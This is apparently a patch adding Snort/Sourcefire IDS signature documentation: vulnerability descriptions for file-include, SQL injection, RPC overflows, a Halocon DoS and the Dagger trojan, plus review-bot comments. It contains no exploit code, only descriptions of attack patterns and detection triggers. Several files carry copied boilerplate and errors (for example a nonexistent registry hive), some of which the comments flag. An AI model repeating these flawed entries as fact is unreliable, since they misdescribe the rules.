+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "ROOT_PATH" parameter in the "header.php" script used by the "phpMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpMyDirectory
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
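Review bot: the third Detailed Information paragraph and the Attack Scenarios section are the generic credential-validation boilerplate from 832.txt ("validating the credentials of a client host", "supply his/her own credentials") and do not describe a remote file include at all; for this rule the scenario is the one the Summary already gives, a remote file passed in the ROOT_PATH parameter that header.php then includes and executes. Drop the boilerplate paragraph and rewrite Attack Scenarios to match the Summary; "ona" in that paragraph should also be "on a".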
--- /dev/null
+++ b/doc/signatures/100000776.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000776
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "query" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "query" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
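Review bot: the third Detailed Information paragraph ("validating the credentials of a client host") is the same credential-checking boilerplate copied from 832.txt and has nothing to do with SQL injection through the "query" parameter; remove it. Corrective Action should also name the application-level fix for this class of bug, parameterised queries instead of SQL built from user input, alongside applying vendor patches. The separators after the Sid, Affected Systems and Contributors sections are missing the blank line used in the rest of the patch.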
--- /dev/null
+++ b/doc/signatures/832.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+832
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
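Review bot: the Summary ("a known vulnerability in a CGI web application") never names the application or the vulnerability that sid 832 matches, and Additional References is empty, so this document gives an analyst no way to confirm or tune the alert; please state what request pattern the rule looks for and which application it targets. "ona" in Detailed Information should be "on a".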
--- /dev/null
+++ b/doc/signatures/1738.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1738
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
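Review bot: as with 832.txt, the Summary and Detailed Information here are generic ("a known vulnerability on a web server or a web application") and Additional References is empty, so nothing in the document is specific to sid 1738; it should name the request pattern or product the rule matches so the alert can be verified. Minor: "Web server" and "web server" are both used in the same paragraph.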
--- /dev/null
+++ b/doc/signatures/1569.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+1569
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+	AHG EZshopper v3.0 and v2.0 for UNIX
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+NSFocus:
+http://www.nsfocus.com/english/homepage/research/0009.htm
+
+--
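Review bot: the Attack Scenarios paragraph talks about browsing "folders outside the ftp root directory", but Affected Systems lists only AHG EZshopper, which is a web application, and the Summary describes a web directory traversal; the "ftp root" wording appears to have been copied from an FTP rule and should say the web root (or the EZshopper document root). Minor: Affected Systems begins with an empty line, the first Corrective Action line lacks a full stop, and the separator before Additional References has a trailing space.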
--- /dev/null
+++ b/doc/signatures/2310.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2310
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
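Review bot: Corrective Action lists only patches and service packs, while Detailed Information places the overflow in a DCE/RPC call into the Workstation service; the DCOM documents in this patch give an interim network-level mitigation (blocking the RPC ports from external sources with a packet filter) and the same guidance would help here for hosts that cannot be patched straight away. Minor: "None known" under False Negatives lacks the full stop used under False Positives.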
--- /dev/null
+++ b/doc/signatures/3305.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3305
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
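Review bot: the Attack Scenarios paragraph ("a request for a file with an overly long filename via a network share") does not match the malformed-RPC-request overflow that Detailed Information describes and should be rewritten to describe that request. "Expoit" under Ease of Attack should be "Exploit", and Additional References is empty for a vulnerability that has a vendor bulletin and CVE entry. This text is also repeated verbatim under sids 3299 and 3257 in this patch; if the three rules match different parts of the same traffic, each document should say what distinguishes its rule.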
--- /dev/null
+++ b/doc/signatures/3299.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3299
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
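Review bot: this file is a verbatim copy of 3305.txt and inherits its problems: the Attack Scenarios text ("overly long filename via a network share") does not match the malformed RPC request described in Detailed Information, "Expoit" should read "Exploit", and Additional References is empty. Please say what sid 3299 matches that 3305 and 3257 do not; identical text gives the analyst no reason for three separate alerts.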
--- /dev/null
+++ b/doc/signatures/100000102.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+100000102
+
+-- 
+Summary: 
+This event is generated when an empty UDP packet is sent to port 2305, where 
+Halocon game servers typically listen.
+
+-- 
+
+Impact: 
+After receiving such a packet, the server will no longer listen on this port, 
+denying the administrator the ability to send remote commands.
+
+--
+Detailed Information:
+Halocon servers listen to UDP port 2305 for commands. Upon receiving an empty 
+UDP packet to that port, the server shuts down the port. Administrators can no 
+longer send remote commands to the server, effectively causing a denial of 
+service. The server must be restarted to re-open the port.
+
+--
+Affected Systems:
+Halocon 2.0.0.81
+
+--
+
+Attack Scenarios: 
+A script that generates empty UDP packets can be used to perform this attack.
+
+-- 
+
+Ease of Attack: 
+Simple; public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+No known patches or workarounds exist. System administrators may be able to 
+reject these packets at their firewall, depending upon the abilities of the 
+firewall system they use.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
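Review bot: False Positives ("None Known") is optimistic for a rule whose trigger is an empty UDP datagram to port 2305: any other zero-length UDP datagram to that port, such as a scanner probe or traffic to some other service that happens to use port 2305, would match as well, so the section should at least mention scanning traffic. The extra blank lines after several "--" separators (before Impact, Attack Scenarios, Ease of Attack and Corrective Action) also break the one-blank-line layout every other file in the patch uses.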
--- /dev/null
+++ b/doc/signatures/3257.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3257
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
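Review bot: this file is a verbatim copy of 3305.txt and 3299.txt, so the same corrections apply: the Attack Scenarios text does not describe the malformed RPC request given in Detailed Information, "Expoit" should be "Exploit", and Additional References is empty. Please state what sid 3257 matches that the other two rules do not.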
--- /dev/null
+++ b/doc/signatures/104.txt
@@ -0,0 +1,107 @@
+Rule:
+
+--
+Sid:
+104
+
+--
+Summary:
+Dagger is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the
+server to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	104	Dagger_1.4.0_client_connect (incoming TCP connection)
+	105	Dagger_1.4.0 (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
+	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+
+Registry keys added are:
+
+	"SysManager"="C:\\WINDOWS\\System\\Manager.exe"
+
+Removal of the file Manager.exe is required. Also end the process 
+Manager.exe.
+
+A machine reboot may be required to clear the existing process from 
+running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS484
+
+TLSecurity
+http://www.tlsecurity.net/backdoor/Dagger.1.4.html (link appears to be 
+inactive)
+
+Dark-e
+http://www.dark-e.com/archive/trojans/dagger/140/index.shtml
+
+--
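Review bot: the registry hive in the Corrective Action section is misnamed: `HKEY_CLASSES_USER` is not a Windows hive, and the per-user `...\CurrentVersion\Run` and `RunServices` keys live under `HKEY_CURRENT_USER`, so the first two entries should read `[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]` and `[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]`. An administrator following the text as written will look in a hive that does not exist and leave the persistence entry in place. Two smaller fixes in the same hunk: `exceutable` should be `executable` in the Detailed Information paragraph, and `windows` should be capitalised there.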
--- /dev/null
+++ b/doc/signatures/2308.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2308
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
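Review bot: the `Rule:` field at the top of 2308.txt is empty, so a reader cannot tell which signature the text describes or check the Detailed Information (overly long strings sent to the Workstation logging function over DCE/RPC) against what the rule actually matches; 2464.txt in this same patch shows the intended format with the full `alert` line filled in. Minor: `None known` under False Negatives is missing its full stop, unlike the False Positives entry above it.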
--- /dev/null
+++ b/doc/signatures/1897.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1897
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
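Review bot: the `--` separator before `Affected Systems:` is missing (the header follows the blank line after `Authentication is not required to cause the overflow.` directly), which breaks the section layout every other file in this patch uses; add `+--` before that header. Also `compromize` in the Impact line should be `compromise`, `kerberos` should be capitalised in both places, and `Sid: 1897` on one line differs from the two-line `Sid:` / value form used elsewhere.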
--- /dev/null
+++ b/doc/signatures/100000590.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000590
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "editor_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "editor_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2306.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Gallery running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to include script when
+accessing the file index.php for the PHP application Gallery. This
+application fails to properly check the source of an included file in
+the script index.php. As a result an attacker is presented with the
+opportunity to execute code of their choosing with the privileges of the
+user running the web server.
+
+--
+Affected Systems:
+	All systems running the PHP application Calerndar.
+
+--
+Attack Scenarios:
+An attacker can include code of their choosing by supplying a URI to
+their script as a parameter to the HTTP GET request.
+
+--
+Ease of Attack:
+Simple. No exploit required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
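Review bot: the Affected Systems entry (`All systems running the PHP application Calerndar.`) contradicts the rest of the file, which is about the PHP application Gallery and its `index.php`; this looks like a copy-and-paste from another signature and should read `All systems running the PHP application Gallery.` The `Sid:` field is also empty even though the file is `2306.txt`, so the value should be filled in to match the filename convention used by the other files in this patch.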
--- /dev/null
+++ b/doc/signatures/2494.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2494
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft RPC service.
+
+--
+Impact:
+Denial of Service (DoS). Possible execution of arbitrary code leading to
+unauthorized remote access to the victim host.
+
+--
+Detailed Information:
+It may be possible for an attacker to cause a DoS condition in the
+Microsoft RPC service when multiple simultaneous requests are made to a
+vulnerable host. This can lead to an exhaustion of system resources
+causing the DoS.
+
+--
+Affected Systems:
+	Windows systems running RPC services
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the RPC service many times in an
+attempt to cause the DoS condition to occur.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
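Review bot: `Apply the appropriate vendor supplied patches` under Corrective Action has no full stop, and `Additional References:` is empty, so there is no pointer to the vendor bulletin that the patch advice relies on; 2308.txt in this patch shows the expected CERT and Microsoft entries. The `Ease of Attack: Difficult.` rating also sits oddly beside an Attack Scenarios section that reads as plain resource exhaustion through repeated binds; say why it is rated difficult or reconsider the rating.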
--- /dev/null
+++ b/doc/signatures/100000438.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000438
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Claroline" application running on a webserver. Access to the file "mambo.inc.php" using a remote file being passed as the "includepath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "includepath" parameter in the "mambo.inc.php" script used by the "Claroline" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Claroline
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
